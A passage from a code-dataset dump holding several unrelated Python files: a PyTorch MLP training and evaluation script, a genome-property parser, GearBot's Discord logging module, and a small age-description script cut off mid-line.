dim=0)\n return y_true, y_pred\n\ndef predict(model, loader, multilabel):\n model.eval()\n y_true = torch.FloatTensor()\n y_pred = torch.FloatTensor()\n for data in loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n if multilabel:\n num_pos_labels = y_hat.shape[1] // 2\n y_hat = torch.max(y_hat[:,-num_pos_labels:], 1).values\n y = torch.max(y[:,-num_pos_labels:], 1).values\n else:\n y_hat = torch.sigmoid(y_hat)\n y_hat = y_hat.view(y_hat.shape[0])\n y_true = torch.cat((y_true, y.to('cpu').float()), dim=0)\n y_pred = torch.cat((y_pred, y_hat.to('cpu').float()), dim=0)\n return y_true, y_pred\n\n# ROC_AUC curve\ndef plt_roc_auc_curve(model, loader, model_name, multilabel):\n # predict probabilities\n y_test, model_probs = predict(model, loader, multilabel)\n # convert from Torch to Numpy\n y_test, model_probs = y_test.detach().numpy(), model_probs.detach().numpy()\n # generate a no skill prediction (majority class)\n ns_probs = [0 for _ in range(len(y_test))]\n # calculate scores\n ns_auc = roc_auc_score(y_test, ns_probs)\n model_auc = roc_auc_score(y_test, model_probs)\n # summarize scores\n print('No Skill: ROC AUC=%.3f' % (ns_auc))\n print(model_name + ': ROC AUC=%.3f' % (model_auc))\n # calculate roc curves\n ns_fpr, ns_tpr, _ = roc_curve(y_test, ns_probs)\n model_fpr, model_tpr, _ = roc_curve(y_test, model_probs)\n # plot the roc curve for the model\n plt.plot(ns_fpr, ns_tpr, linestyle='--', label='No Skill')\n plt.plot(model_fpr, model_tpr, marker='.', label=model_name)\n # axis labels\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n # show the legend\n plt.legend()\n # show the plot\n plt.show()\n\ndef plt_precision_recall_curve(model, loader, model_name, multilabel):\n # predict probabilities\n y_test, model_probs = predict(model, loader, multilabel)\n # convert from Torch to Numpy\n y_test, model_probs = y_test.detach().numpy(), model_probs.detach().numpy()\n # predict class values\n _, y_pred = classify(model, loader, multilabel)\n # convert from Torch to Numpy\n y_pred = y_pred.detach().numpy()\n model_precision, model_recall, _ = precision_recall_curve(y_test, model_probs)\n model_f1, model_auc = f1_score(y_test, y_pred), auc(model_recall, model_precision)\n # summarize scores\n print(model_name + ': f1=%.3f auc=%.3f' % (model_f1, model_auc))\n # plot the precision-recall curves\n no_skill = len(y_test[y_test==1]) / len(y_test)\n plt.plot([0, 1], [no_skill, no_skill], linestyle='--', label='No Skill')\n plt.plot(model_recall, model_precision, marker='.', label=model_name)\n # axis labels\n plt.xlabel('Recall')\n plt.ylabel('Precision')\n # show the legend\n plt.legend()\n # show the plot\n plt.show()\n\ndef evaluate(model, test_loader, multilabel):\n # Prediction\n y_true, y_pred = classify(model, test_loader, multilabel)\n\n # Classification report (recall, preccision, f-score, accuracy)\n print(classification_report(y_true, y_pred, digits=4))\n print()\n tn, fp, fn, tp = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n print('TN:',tn, 'FP:',fp, 'FN:',fn, 'TP:',tp )\n\n # ROC_AUC curve\n model_name='MLP'\n print()\n plt_roc_auc_curve(model, test_loader, model_name, multilabel)\n # Precision_Recall curve\n print()\n plt_precision_recall_curve(model, test_loader, model_name, multilabel)\n return\n\n#-------------------------------------Binary-------------------------------------\ndef binary(dataset, n_epochs, nodes, batch_size = 32, upper_y_lim = 1, p = 0.5):\n train_loader, val_loader, test_loader = create_loaders(dataset, 1, batch_size, balance = True)\n\n # create a training function that will output the model and its metrics for given nodes\n def train(dataset, n_epochs, nodes, p):\n num_in = dataset.shape[1] - 1\n num_out = 1\n model = MLP(nodes, p, num_in, num_out, multilabel=False).to(device)\n criterion = nn.BCEWithLogitsLoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n train_loss = []\n val_loss = []\n for epoch in tqdm(range(n_epochs)):\n train_loss_epoch = 0\n val_loss_epoch = 0\n model.train()\n for data in train_loader:\n x, y = data[0].to(device), data[1].to(device)\n optimizer.zero_grad()\n y_hat = model(x)\n y_hat = y_hat.view(y_hat.shape[0])\n loss = criterion(y_hat, y)\n loss.backward()\n optimizer.step()\n train_loss_epoch += loss.item()\n model.eval()\n for data in val_loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n y_hat = y_hat.view(y_hat.shape[0])\n loss = criterion(y_hat, y)\n val_loss_epoch += loss.item()\n train_loss.append(train_loss_epoch / len(train_loader))\n val_loss.append(val_loss_epoch / len(val_loader))\n return model, train_loss, val_loss\n\n model, train_loss, val_loss = train(dataset, n_epochs, nodes, p)\n plot_loss(n_epochs, train_loss, val_loss, upper_y_lim)\n evaluate(model, test_loader, multilabel = False)\n \n return model\n\n#-----------------------------------Mulitlabel-----------------------------------\ndef multilabel(dataset, num_y, n_epochs, nodes, batch_size = 32, upper_y_lim = 1, p = 0.5):\n train_loader, val_loader, test_loader = create_loaders(dataset, num_y, batch_size, balance = False)\n \n # create a training function that will output the model and its metrics for given nodes\n def train(dataset, num_y, n_epochs, nodes, p):\n num_in = dataset.shape[1] - num_y\n num_out = num_y\n model = MLP(nodes, p, num_in, num_out, multilabel=True).to(device)\n criterion = nn.BCELoss()\n optimizer = torch.optim.Adam(model.parameters(), lr=0.001)\n train_loss = []\n val_loss = []\n for epoch in tqdm(range(n_epochs)):\n train_loss_epoch = 0\n val_loss_epoch = 0\n model.train()\n for data in train_loader:\n x, y = data[0].to(device), data[1].to(device)\n optimizer.zero_grad()\n y_hat = model(x)\n loss = criterion(y_hat, y)\n loss.backward()\n optimizer.step()\n train_loss_epoch += loss.item()\n model.eval()\n for data in val_loader:\n x, y = data[0].to(device), data[1].to(device)\n y_hat = model(x)\n loss = criterion(y_hat, y)\n val_loss_epoch += loss.item()\n train_loss.append(train_loss_epoch / len(train_loader))\n val_loss.append(val_loss_epoch / len(val_loader))\n return model, train_loss, val_loss\n \n model, train_loss, val_loss = train(dataset, num_y, n_epochs, nodes, p)\n plot_loss(n_epochs, train_loss, val_loss, upper_y_lim)\n evaluate(model, test_loader, multilabel = True)\n \n return model","sub_path":"MLP.py","file_name":"MLP.py","file_ext":"py","file_size_in_byte":15932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"413580606","text":"#!/usr/bin/env python\n\n\"\"\"\nCreated by: Lee Bergstrand (2017)\n\nDescription: The genome property class.\n\"\"\"\nfrom modules.database_reference import parse_database_references\nfrom modules.literature_reference import parse_literature_references\nfrom modules.step import parse_steps\n\n\nclass GenomeProperty(object):\n \"\"\"\n Represents a EBI Interpro genome property. Each represents specific capabilities of an\n organism as proven by the presence of genes found in its genome.\n \"\"\"\n\n def __init__(self, accession_id, name, property_type, threshold=0,\n parent=None, references=None, databases=None, steps=None,\n public=False, description=None, private_notes=None):\n \"\"\"\n Creates a new GenomeProperty object.\n :param accession_id: The genome property accession (i.e. \"GenProp00286\").\n :param name: The name of the genome property.\n :param property_type: The type of genome property (ex. \"METAPATH\").\n :param threshold: Is a threshold that the number of required steps must exceed.\n :param parent: The parent genome property of the current genome property (parent accession or direct link).\n :param references: A list of reference objects which help support the existence of the property.\n :param databases: A list of database objects which represent database entries related to the property.\n :param steps: A list of step objects that are part of the property.\n :param public: Boolean detailing if the genome property should be public.\n :param description: A detailed description of the genome property.\n :param private_notes: Private notes about the property a potential problems with it.\n \"\"\"\n if steps is None:\n steps = []\n if databases is None:\n databases = []\n if references is None:\n references = []\n\n self.id = accession_id\n self.name = name\n self.type = property_type\n self.threshold = threshold\n self.references = references\n self.databases = databases\n self.parent = parent\n self.steps = steps\n self.public = public\n self.description = description\n self.private_notes = private_notes\n\n def __repr__(self):\n has_references = False\n has_steps = False\n has_databases = False\n\n if self.references:\n has_references = True\n\n if self.steps:\n has_steps = True\n\n if self.databases:\n has_databases = True\n\n repr_data = [str(self.id),\n 'Type: ' + str(self.type),\n 'Name: ' + str(self.name),\n 'Thresh: ' + str(self.threshold),\n 'References: ' + str(has_references),\n 'Databases: ' + str(self.type),\n 'Steps: ' + str(has_steps),\n 'Parent: ' + str(has_databases),\n 'Public: ' + str(self.public)]\n\n return ', '.join(repr_data)\n\n\ndef parse_genome_property(genome_property_record):\n \"\"\"\n Parses a single genome property from a genome property record.\n :param genome_property_record: A list of marker, content tuples representing genome property flat file lines.\n :return: A single genome property object.\n \"\"\"\n # A list of record markers related to the genome property.\n core_genome_property_markers = ('AC', 'DE', 'TP', 'TH', 'PN', 'CC', '**')\n gathered_core_genome_property_markers = {}\n\n reference_index = False\n database_index = False\n step_index = False\n\n current_index = 0\n for marker, content in genome_property_record:\n if marker == 'RN':\n if not reference_index:\n reference_index = current_index\n elif marker == 'DC':\n if not database_index:\n database_index = current_index\n elif marker == '--':\n step_index = current_index + 1\n break # If we have reach steps we have covered all core_genome_property_markers and can leave the loop.\n elif marker in core_genome_property_markers:\n if marker == 'TH':\n content = int(content)\n gathered_core_genome_property_markers[marker] = content\n\n current_index = current_index + 1\n\n if reference_index:\n if database_index:\n reference_rows = genome_property_record[reference_index:database_index]\n else:\n reference_rows = genome_property_record[reference_index:]\n\n references = parse_literature_references(reference_rows)\n else:\n references = []\n\n if database_index:\n if step_index:\n database_rows = genome_property_record[database_index:step_index - 1]\n else:\n database_rows = genome_property_record[database_index:]\n\n databases = parse_database_references(database_rows)\n else:\n databases = []\n\n if step_index:\n step_rows = genome_property_record[step_index:]\n steps = parse_steps(step_rows)\n else:\n steps = []\n\n new_genome_property = GenomeProperty(accession_id=gathered_core_genome_property_markers.get('AC'),\n name=gathered_core_genome_property_markers.get('DE'),\n property_type=gathered_core_genome_property_markers.get('TP'),\n threshold=gathered_core_genome_property_markers.get('TH'),\n parent=gathered_core_genome_property_markers.get('PN'),\n description=gathered_core_genome_property_markers.get('CC'),\n private_notes=gathered_core_genome_property_markers.get('**'),\n references=references,\n databases=databases,\n steps=steps)\n return new_genome_property\n","sub_path":"modules/genome_property.py","file_name":"genome_property.py","file_ext":"py","file_size_in_byte":6009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"533829111","text":"import asyncio\nimport io\nimport logging\nimport os\nimport sys\nimport traceback\nfrom collections import namedtuple\nfrom concurrent.futures import CancelledError\nfrom datetime import datetime\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport discord\nimport pytz\nimport sentry_sdk\nfrom aiohttp import ClientOSError, ServerDisconnectedError\nfrom discord import ConnectionClosed\nfrom discord.ext import commands\n\nfrom Bot import TheRealGearBot\nfrom Util import Configuration, Utils, MessageUtils\n\nLOGGER = logging.getLogger('gearbot')\nDISCORD_LOGGER = logging.getLogger('discord')\n\nBOT_LOG_CHANNEL: discord.TextChannel = None\nSTARTUP_ERRORS = []\nBOT: commands.AutoShardedBot = None\nLOG_PUMP = None\nLOG_ERRORS = 0\n\nlog_type = namedtuple(\"Log_type\", \"category emoji\")\nLOG_TYPES = {\n \"raid_new\": log_type('RAID_LOGS', 'BAD_USER'),\n \"raid_terminated\": log_type(\"RAID_LOGS\", 'INNOCENT'),\n 'censored_message': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'censor_message_failed': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'censored_invite': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'invite_censor_fail': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'invite_censor_forbidden': log_type('CENSORED_MESSAGES', 'WARNING'),\n 'automod_ban_failed': log_type('MOD_ACTIONS', 'WARNING'),\n 'warning_added_modlog': log_type('MOD_ACTIONS', 'WARNING'),\n 'warning_could_not_dm': log_type('MOD_ACTIONS', 'WARNING'),\n 'inf_delete_log': log_type('MOD_ACTIONS', 'DELETE'),\n 'ban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'kick_log': log_type('MOD_ACTIONS', 'BOOT'),\n 'mute_role_already_removed': log_type('MOD_ACTIONS', 'WARNING'),\n 'unmute_missing_perms': log_type('MOD_ACTIONS', 'WARNING'),\n 'unmute_unknown_error': log_type('MOD_ACTIONS', 'WARNING'),\n 'unmuted': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'tempban_expired_missing_perms': log_type('MOD_ACTIONS', 'WARNING'),\n 'tempban_already_lifted': log_type('MOD_ACTIONS', 'WARNING'),\n 'tempban_lifted': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'softban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'forceban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'mute_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_duration_extended_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_duration_added_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_duration_overwritten_log': log_type('MOD_ACTIONS', 'MUTE'),\n 'mute_reapply_log': log_type('MOD_ACTIONS', 'BAD_USER'),\n 'mute_reapply_failed_log': log_type('MOD_ACTIONS', 'WARNING'),\n 'tempban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'unban_log': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'unmute_modlog': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'channel_update_simple': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'channel_update_simple_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'role_update_simple': log_type('ROLE_CHANGES', 'ALTER'),\n 'role_update_simple_by': log_type('ROLE_CHANGES', 'ALTER'),\n 'command_used': log_type('COMMAND_EXECUTED', 'WRENCH'),\n 'channel_created_by': log_type('ROLE_CHANGES', 'CREATE'),\n 'channel_created': log_type('ROLE_CHANGES', 'CREATE'),\n 'channel_deleted_by': log_type('channel_deleted_by', 'DELETE'),\n 'channel_deleted': log_type('channel_deleted_by', 'DELETE'),\n 'permission_override_update': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_update_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_update_role': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_update_role_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed_role': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_removed_role_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added_role': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'permission_override_added_role_by': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'role_created_by': log_type('ROLE_CHANGES', 'CREATE'),\n 'role_created': log_type('ROLE_CHANGES', 'CREATE'),\n 'role_deleted': log_type('ROLE_CHANGES', 'DELETE'),\n 'role_update_perm_added': log_type('ROLE_CHANGES', 'ALTER'),\n 'role_update_perm_added_by': log_type('ROLE_CHANGES', 'DELETE'),\n 'role_update_perm_revoked': log_type('ROLE_CHANGES', 'DELETE'),\n 'role_update_perm_revoked_by': log_type('ROLE_CHANGES', 'DELETE'),\n 'manual_ban_log': log_type('MOD_ACTIONS', 'BAN'),\n 'join_logging': log_type('JOIN_LOGS', 'JOIN'),\n 'join_logging_new': log_type('JOIN_LOGS', 'JOIN'),\n 'leave_logging': log_type('JOIN_LOGS', 'LEAVE'),\n 'manual_unban_log': log_type('MOD_ACTIONS', 'INNOCENT'),\n 'own_nickname_changed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'unknown_nickname_changed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'mod_nickname_changed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'unknown_nickname_added': log_type('NAME_CHANGES', 'NICKTAG'),\n 'own_nickname_added': log_type('NAME_CHANGES', 'NICKTAG'),\n 'mod_nickname_added': log_type('NAME_CHANGES', 'NICKTAG'),\n 'own_nickname_removed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'mod_nickname_removed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'role_removed_by': log_type('ROLE_CHANGES', 'ROLE_REMOVE'),\n 'role_added_by': log_type('ROLE_CHANGES', 'ROLE_ADD'),\n 'role_removed': log_type('ROLE_CHANGES', 'ROLE_REMOVE'),\n 'role_added': log_type('ROLE_CHANGES', 'ROLE_ADD'),\n 'message_removed': log_type('EDIT_LOGS', 'TRASH'),\n 'edit_logging': log_type('EDIT_LOGS', 'EDIT'),\n 'username_changed': log_type('NAME_CHANGES', 'NAMETAG'),\n 'voice_change_deaf_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_deaf_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_mute_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_mute_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_mute_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_mute_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_deaf_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_self_deaf_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_afk_true': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'voice_change_afk_false': log_type('VOICE_CHANGES_DETAILED', 'VOICE'),\n 'connected_to_voice': log_type('VOICE_CHANGES', 'VOICE'),\n 'disconnected_voice': log_type('VOICE_CHANGES', 'VOICE'),\n 'moved_voice': log_type('VOICE_CHANGES', 'VOICE'),\n 'purged_log': log_type('EDIT_LOGS', 'DELETE'),\n 'raid_mute_failed_no_role': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_message_failed': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_notification_failed': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_notification_forbidden': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_shield_triggered': log_type('RAID_LOGS', 'BAD_USER'),\n 'raid_shield_terminated': log_type('RAID_LOGS', 'INNOCENT'),\n 'unknown_nickname_removed': log_type('NAME_CHANGES', 'NICKTAG'),\n 'message_pinned': log_type('EDIT_LOGS', 'PIN'),\n 'message_pinned_by': log_type('EDIT_LOGS', 'PIN'),\n 'message_unpinned': log_type('EDIT_LOGS', 'PIN'),\n 'raid_message_failed_missing_channel': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_failed_channel': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_failed_channel_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_user_not_found': log_type('RAID_LOGS', 'WARNING'),\n 'raid_message_user_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_mute_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_mute_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'raid_kick_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_kick_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'raid_ban_forbidden': log_type('RAID_LOGS', 'WARNING'),\n 'raid_ban_unknown_error': log_type('RAID_LOGS', 'WARNING'),\n 'shield_time_limit_reached': log_type('RAID_LOGS', 'WARNING'),\n 'slowmode_log': log_type('CHANNEL_CHANGES', 'ALTER'),\n 'spam_violate': log_type('SPAM_VIOLATION', 'BAD_USER'),\n \"config_change\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_change_role_removed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_change_role_added\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_role_disabled\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_role_changed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_role_set\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_setup_triggered\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_setup_complete\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_setup_failed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_cleanup_triggered\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_cleanup_complete\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_mute_cleanup_failed\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"config_dash_security_change\": log_type('CONFIG_CHANGES', 'WRENCH'),\n \"verification_log\": log_type('MOD_ACTIONS', 'WRENCH')\n\n\n\n\n}\n\ndef before_send(event, hint):\n if event['level'] == \"error\" and 'logger' in event.keys() and event['logger'] == 'gearbot':\n return None # we send errors manually, in a much cleaner way\n if 'exc_info' in hint:\n exc_type, exc_value, tb = hint['exc_info']\n for t in [ConnectionClosed, ClientOSError, ServerDisconnectedError]:\n if isinstance(exc_value, t):\n return\n event['fingerprint'] = ['database-unavailable']\n return event\n\n\ndef init_logger():\n # track commits to make sentry versions\n dsn = Configuration.get_master_var('SENTRY_DSN', '')\n if dsn != '':\n sentry_sdk.init(dsn, before_send=before_send)\n\n LOGGER.setLevel(logging.DEBUG)\n\n DISCORD_LOGGER.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s')\n\n handler = logging.StreamHandler(stream=sys.stdout)\n handler.setLevel(logging.INFO)\n handler.setFormatter(formatter)\n LOGGER.addHandler(handler)\n DISCORD_LOGGER.addHandler(handler)\n\n if not os.path.isdir(\"logs\"):\n os.mkdir(\"logs\")\n handler = TimedRotatingFileHandler(filename='logs/gearbot.log', encoding='utf-8', when=\"midnight\", backupCount=30)\n handler.setFormatter(formatter)\n handler.setLevel(logging.INFO)\n DISCORD_LOGGER.addHandler(handler)\n LOGGER.addHandler(handler)\n\n # handler = TimedRotatingFileHandler(filename='logs/discord.log', encoding='utf-8', when=\"h\", interval=1, backupCount=24)\n\n # DISCORD_LOGGER.addHandler(handler)\n\n\nasync def initialize(bot: commands.Bot, channelID):\n global BOT_LOG_CHANNEL, BOT, STARTUP_ERRORS, LOG_PUMP\n BOT = bot\n BOT_LOG_CHANNEL = bot.get_channel(int(channelID))\n if BOT_LOG_CHANNEL is None:\n LOGGER.error(\n \"==========================Logging channel is misconfigured, aborting startup!==========================\")\n await bot.logout()\n\n if len(STARTUP_ERRORS) > 0:\n await bot_log(\n f\":rotating_light: Caught {len(STARTUP_ERRORS)} {'exceptions' if len(STARTUP_ERRORS) > 1 else 'exception'} during startup.\")\n for e in STARTUP_ERRORS:\n await e\n STARTUP_ERRORS = []\n\n\ndef initialize_pump(bot):\n global LOG_PUMP\n LOG_PUMP = LogPump(bot)\n bot.loop.create_task(LOG_PUMP.pump())\n\n\ndef debug(message):\n LOGGER.debug(message)\n\n\ndef info(message):\n LOGGER.info(message)\n\n\ndef warn(message):\n LOGGER.warning(message)\n\n\ndef error(message):\n LOGGER.error(message)\n\n\ndef exception(message, error):\n LOGGER.error(message)\n trace = \"\"\n LOGGER.error(str(error))\n for line in traceback.format_tb(error.__traceback__):\n trace = f\"{trace}\\n{line}\"\n LOGGER.error(trace)\n\n\nasync def bot_log(message=None, embed=None):\n global BOT_LOG_CHANNEL, STARTUP_ERRORS\n if BOT_LOG_CHANNEL is not None:\n return await BOT_LOG_CHANNEL.send(content=message, embed=embed)\n else:\n STARTUP_ERRORS.append(bot_log(message, embed))\n\n\ndef log_raw(guild_id, location, message=None, embed=None, file=None):\n if isinstance(embed, int):\n raise ValueError(\"WTH IS SPAMMING MY LOGS?\")\n channels = Configuration.get_var(guild_id, \"LOG_CHANNELS\")\n if message is None and embed is None and file is None:\n raise ValueError(\"What the heck is trying to log nothing?\")\n if message is not None:\n message = Utils.trim_message(message, 1998)\n for cid, info in channels.items():\n if location in info:\n LOG_PUMP.receive(cid, (message, embed, file))\n\n\ndef log_to(guild_id, key, embed=None, file=None, can_stamp=True, tag_on=None, **kwargs):\n if isinstance(embed, int):\n raise ValueError(\"WTH IS SPAMMING MY LOGS?\")\n info = LOG_TYPES[key]\n remaining = None\n if key is None and embed is None and file is None:\n raise ValueError(\"What the heck is trying to log nothing?\")\n stamp = f\"[``{datetime.strftime(datetime.now().astimezone(pytz.timezone(Configuration.get_var(guild_id, 'GENERAL', 'TIMEZONE'))), '%H:%M:%S')}``] \" if can_stamp and Configuration.get_var(guild_id, 'GENERAL', \"TIMESTAMPS\") else \"\"\n m = MessageUtils.assemble(guild_id, info.emoji, key, **kwargs).replace('@', '@\\u200b')\n message = f\"{stamp}{Utils.trim_message(m, 1984)}\".replace(\"None\", \"\", 1)\n if tag_on is not None:\n tag_on = tag_on.replace('@', '@\\u200b')\n if message is None:\n message = tag_on\n else:\n if len(message) + len(tag_on) <= 1998:\n message = f\"{message} {tag_on}\"\n else:\n remaining = tag_on\n if message is not None:\n message = Utils.trim_message(message, 1998)\n channels = Configuration.get_var(guild_id, \"LOG_CHANNELS\")\n\n for cid, logging_keys in channels.items():\n if info.category in logging_keys:\n f = None\n if file is not None:\n buffer = file[0]\n name = file[1]\n buffer.seek(0)\n b2 = io.BytesIO()\n for line in buffer.readlines():\n b2.write(line)\n b2.seek(0)\n f = discord.File(b2, name)\n if remaining is None:\n LOG_PUMP.receive(cid, (message, embed, f))\n else:\n LOG_PUMP.receive(cid, (message, None, None))\n LOG_PUMP.receive(cid, (tag_on, embed, f))\n\n\nasync def message_owner(bot, message):\n if bot.owner_id is None:\n app = await bot.application_info()\n bot.owner_id = app.owner.id\n owner = bot.get_user(bot.owner_id)\n await owner.send(message)\n\n\nclass LogPump:\n\n def __init__(self, bot):\n self.todo = dict()\n self.running = True\n self.bot = bot\n self.NUKED = False\n info(\"Starting log pump\")\n\n async def pump(self):\n info(\"Log pump engaged\")\n empty = []\n embed = file = cid = todo = to_send = None\n while (self.running or len(self.todo) > 0) and not self.NUKED:\n try:\n empty = []\n senders = []\n embed = file = None\n for cid, todo in self.todo.items():\n channel = BOT.get_channel(int(cid))\n if channel is not None and len(todo) > 0:\n permissions = channel.permissions_for(channel.guild.me)\n to_send = \"\"\n while len(todo) > 0:\n message, embed, file = todo[0]\n if message is None or message.strip() == \"\":\n message = \"\"\n if (not permissions.send_messages) or (\n embed is not None and not permissions.embed_links) or (\n file is not None and not permissions.attach_files):\n todo.pop(0)\n continue\n elif len(to_send) + len(message) <= 1999:\n to_send += f\"{message}\\n\"\n todo.pop(0)\n else:\n break\n if embed is not None or file is not None:\n break\n try:\n senders.append(channel.send(to_send if to_send != \"\" else None, embed=embed, file=file))\n except CancelledError:\n return\n except Exception as e:\n await TheRealGearBot.handle_exception(\"LOG PUMP\", BOT, e,\n cid=cid, todo=todo, to_send=to_send,\n LOG_CACHE=self.todo, embed=embed,\n file=file, empty=empty)\n else:\n empty.append(cid)\n for e in empty:\n del self.todo[e]\n for s in senders:\n try:\n await s\n except discord.Forbidden:\n pass\n except CancelledError:\n return\n except Exception as e:\n await log_error()\n await TheRealGearBot.handle_exception(\"LOG PUMP\", BOT, e,\n cid=cid, todo=todo, to_send=to_send,\n LOG_CACHE=self.todo, embed=embed, file=file,\n empty=empty)\n await asyncio.sleep(0.1)\n except CancelledError:\n return # we're shutting down\n except Exception as e:\n await log_error()\n await TheRealGearBot.handle_exception(\"LOG PUMP\", BOT, e,\n cid=cid, todo=todo, to_send=to_send,\n LOG_CACHE=self.todo, embed=embed, file=file,\n empty=empty)\n info(\"Log pump terminated\")\n\n def receive(self, cid, data):\n if cid not in self.todo:\n self.todo[cid] = []\n self.todo[cid].append(data)\n\n\nasync def log_error():\n global LOG_ERRORS, LOG_PUMP\n LOG_ERRORS += 1\n if LOG_ERRORS >= 10:\n LOG_ERRORS = 0\n error(\"=========Log pump error limit reached, deploying nuke to unclog the system=========\")\n LOG_PUMP.NUKED = True\n initialize_pump(BOT)\n await bot_log(\"Log pump got clogged, nuked and restarted, moving on\")\n","sub_path":"GearBot/Util/GearbotLogging.py","file_name":"GearbotLogging.py","file_ext":"py","file_size_in_byte":19169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"98361594","text":"#startup for AGE GENERATOR: Version 2.0\r\n\r\nimport time as wait\r\nversion_major = '2'\r\nversion_minor = '0'\r\n\r\nprint(\"WELCOME TO:\")\r\nwait.sleep(0.4)\r\n\r\nprint(f\"Age Generator: Version {version_major}.{version_minor}\")\r\nwait.sleep(2)\r\n\r\n#cancel option added 9-27-21 / removed 4-13-22\r\n\r\n# old cancel code at: https://spaceplace.live/agegencancelcode.txt\r\n\r\nprint(\"Loading..\")\r\nwait.sleep(1.5)\r\n\r\n#finding age\r\n\r\nisCorrectInput = False\r\n\r\nwhile isCorrectInput == False:\r\n\r\n val = input(\"Input age: \") \r\n\r\n age = int(val)\r\n\r\n if age < 10:\r\n print(\"Age is too low!\")\r\n wait.sleep(0.8)\r\n if age > 101:\r\n print(\"Age is too high!\")\r\n wait.sleep(0.8)\r\n\r\n if age >= 10:\r\n isCorrectInput = True\r\n\r\n\r\n#started new age description chart 9-27-21 \"IM ON THE FLOOR LAUGHING\"\r\n\r\nprint(\"Loading in Magic...\")\r\nwait.sleep(1)\r\n\r\n#added new code interpretor 4-13-22:\r\n\r\nif age >= 10:\r\n if age < 20:\r\n print(\"Age 10 - 19: Young, looking strong! (But geez, these growing pains suck)!\")\r\nif age >= 20:\r\n if age < 30:\r\n print(\"Age 20 - 29: Getting older; growing less and less by the day...\")\r\nif age >= 30:\r\n if age < 30:\r\n print(\"Age 30 - 39: You have stopped growing altogether. Now the only part of your body that is still developing is your mind.\")\r\nif age >= 40:\r\n if age < 50:\r\n print(\"Age 40 - 49: If you weren't before, now your hair is going white, and you may even start to shrink! 